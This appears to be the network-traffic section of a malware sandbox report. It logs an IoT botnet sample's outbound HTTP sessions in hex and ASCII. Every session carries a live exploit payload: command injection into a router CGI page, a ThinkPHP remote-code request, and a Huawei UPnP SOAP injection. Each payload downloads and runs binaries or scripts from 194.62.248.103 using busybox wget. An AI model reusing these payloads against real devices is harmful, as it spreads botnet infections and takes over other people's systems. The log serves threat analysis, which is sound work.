                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        724192.168.2.233474831.136.214.1038080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:50.103987932 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:51.094167948 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:53.046036005 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:57.013544083 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:04.948266029 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:20.562177896 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:53.069847107 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        725192.168.2.234990262.78.57.1508080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:50.120826960 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        726192.168.2.234231895.129.213.22680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:50.156949997 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:50.458014011 CEST501INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:39:30 GMT
                                                        Server: Apache/2.4.7 (Ubuntu)
                                                        Content-Length: 308
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 66 73 2e 70 72 6f 63 75 72 61 74 69 6f 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.7 (Ubuntu) Server at fs.procuratio.com Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        727192.168.2.235280895.216.161.580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:50.178611040 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:50.502264023 CEST339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:36:50 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        728192.168.2.2333108197.221.180.24737215
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:50.332643032 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.62.248.103 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        729192.168.2.233798831.220.233.2418080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:50.395608902 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        730192.168.2.235127831.136.138.1708080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:50.417351007 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:51.382235050 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:53.301937103 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:57.269464970 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:04.948266029 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:20.306229115 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:51.021927118 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        731192.168.2.234200094.121.78.1658080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:50.456335068 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        732192.168.2.234498694.121.68.588080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:50.460078001 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        733192.168.2.234224662.29.88.2218080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:50.460573912 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        734192.168.2.235882062.29.116.2328080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:50.463035107 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        735192.168.2.234841031.200.65.1788080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:50.742019892 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        736192.168.2.234649288.28.197.4180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:50.819600105 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:51.205832005 CEST515INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:51 GMT
                                                        Server: Apache/2.4.10 (Debian)
                                                        Content-Length: 321
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 64 63 6f 6d 2e 61 6a 75 6e 74 61 6d 65 6e 74 76 69 6c 61 6e 6f 76 61 2e 6c 6f 63 61 6c 20 50 6f 72 74 20 38 31 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
